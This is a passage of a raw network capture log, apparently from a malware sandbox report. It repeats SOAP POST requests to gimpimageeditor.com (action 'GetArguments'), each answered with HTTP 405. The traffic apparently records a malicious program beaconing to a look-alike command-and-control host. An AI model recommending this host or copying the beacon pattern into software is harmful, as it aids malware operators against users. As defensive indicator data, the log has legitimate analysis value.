                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:45.275662899 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:45.592263937 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:45.697760105 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:45.998400927 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:46.104008913 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:46.404712915 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:46.510498047 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:46.795207024 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:46.922837019 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:47.201355934 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:47.307749987 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:47.576476097 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:47.687115908 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:47.951613903 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:48.057534933 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:48.310834885 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:48.418662071 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:48.654884100 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:48.760708094 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:48.998632908 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:49.104809999 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:49.326364994 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:49.432244062 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:49.654653072 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:49.760078907 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:49.967123985 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:50.072853088 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:50.279578924 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:50.385071039 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:50.576453924 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:50.681776047 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:50.873351097 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:50.978755951 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:51.170278072 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:51.277223110 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:51.451720953 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:51.557368994 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:51.732670069 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:51.838217974 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:52.014230013 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:52.120121956 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:52.279494047 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:52.384934902 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:52.545334101 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:52.651191950 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:52.810954094 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:52.916527033 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:53.060952902 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:53.166299105 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:53.311033964 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:53.416815042 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:53.561100006 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:53.666480064 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:53.795171976 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:53.900461912 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:54.029725075 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:54.135875940 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:54.265444994 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:54.371282101 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:54.498302937 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:54.603743076 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:54.716969967 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:54.823019981 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:54.935894966 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:55.041356087 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:55.154629946 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:55.260564089 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:55.373311043 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:55.478616953 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:55.576464891 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:55.681890011 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:55.779604912 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:55.890722990 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:55.982745886 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.088217974 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.185915947 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.291475058 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.388959885 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.495758057 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.592538118 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.697911978 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.779576063 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:56.891376019 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:56.982624054 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.089085102 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.170120955 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.275569916 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.357774019 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.463545084 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.545304060 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.652070999 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.732644081 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:57.838203907 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:57.904496908 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.010360003 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.076441050 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.186618090 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.248420000 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.353944063 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.420393944 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.526032925 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.592437983 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.698016882 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.764004946 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:58.869761944 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:58.935750961 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.043087959 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.107963085 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.214375019 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.279678106 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.386310101 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.435997963 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:59.541879892 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:59.592120886 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
